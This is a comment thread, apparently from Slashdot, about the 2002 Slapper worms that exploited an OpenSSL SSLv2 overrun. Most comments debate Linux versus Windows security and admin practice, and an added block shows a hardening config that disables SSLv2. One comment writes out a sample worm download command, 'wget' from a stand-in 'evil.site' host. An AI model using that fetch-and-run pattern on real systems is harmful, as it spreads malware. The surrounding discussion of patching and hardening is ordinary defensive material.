randomErr writes
"The worms, Slapper.B and Slapper.C, which exploit a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process, have infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company."
Re:A few hopes... (Score:3, Insightful)
It would be preferable to let the security at the bank know that you're about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
Response Time (Score:1, Insightful)
How does this worm affect the cryptographic security of the machine? Should affected webservers get new certificates?
Re:Bravo (Score:2, Insightful)
Yes, just like in the case with Windows.
The Worm (Score:4, Insightful)
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Re:oh no! (Score:3, Insightful)
I think you're being *way* too paranoid.
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms?
Almost nil.
Even if they are, the maintainers share the blame for not reviewing them properly.
A spacious analogy. (Score:2, Insightful)
Exploiting a vulnerability like this is similar to walking down the alley behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase its security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Re:A few hopes... (Score:4, Insightful)
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
It's a distro problem, not a linux problem (Score:5, Insightful)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
We're not really catching up (Score:5, Insightful)
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:The Worm (Score:5, Insightful)
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Re:A few hopes... (Score:2, Insightful)
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip) ...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Don't forget to half-close your eyes
Re:The Worm (Score:1, Insightful)
You cannot compare this to Windows holes, which are usually actual flaws with Windows (since Microsoft is so hell-bent on "integrating" everything with the operating system).
comparison (Score:4, Insightful)
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page [dshield.org], around 25,000 Windows hosts are still estimated as CodeRed infected, one year after the event.
According to news.com [com.com], at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, prove two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
sysadmins? (Score:4, Insightful)
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Re:We're not really catching up (Score:5, Insightful)
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:A false sense of security (Score:3, Insightful)
Good post man.
On Onions and Carrots (Score:4, Insightful)
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearance I had more than 340000 Nimda "visits" on the network I supervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Retarded:A few hopes... (Score:3, Insightful)
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
Slapper: The threat that wasn't? (Score:2, Insightful)
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
Re:Reasons (Score:5, Insightful)
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
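The "disable services you aren't using" point applied to the SSLv2 handshake itself, as an added mod_ssl configuration contrast (not from the thread, nor from the Apache or OpenSSL projects; the host name and certificate paths are placeholders):

```apache
# Constructed example: an Apache mod_ssl virtual host, showing the
# protocol setting before and after hardening.  Host name and paths
# are placeholders, not values from the article.
Listen 443
<VirtualHost _default_:443>
    ServerName www.example.com
    SSLEngine on
    SSLCertificateFile    /etc/ssl/certs/www.example.com.crt
    SSLCertificateKeyFile /etc/ssl/private/www.example.com.key

    # Weak (the directive's default): every protocol the linked
    # OpenSSL supports is offered, so the SSLv2 handshake code path
    # the worm abuses is reachable even though no client needs it.
    #
    #   SSLProtocol all

    # Corrected: refuse SSLv2 outright, so the vulnerable handshake is
    # never entered on this listener.  This only reduces exposed
    # surface; the patched OpenSSL library is still required, since
    # the same library serves every other protocol version.
    SSLProtocol all -SSLv2
</VirtualHost>
```

Run `apachectl configtest` before restarting so a typo in the directive does not take the listener down with it. OpenSSL releases from 1.1.0 onward contain no SSLv2 code at all, so on current builds the directive is redundant, but on the Apache/OpenSSL versions the worm targeted it was the one-line mitigation available before the patch was installed.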
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
Re:A few hopes... (Score:3, Insightful)
While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people write documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioner's name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English (technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could."
Here on
In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes... (Score:5, Insightful)
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on closed or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, because system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue so critical that it should short-circuit regression testing is a difficult art. And what if the production system doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
Re:On Onions and Carrots (Score:1, Insightful)
How many times have we heard that Linux is more secure, Linux admins are just better, Open Source programmers fix problems fast? How many times have we heard, in fact, that nothing like this could happen on Linux? This worm proves otherwise and that is the important point.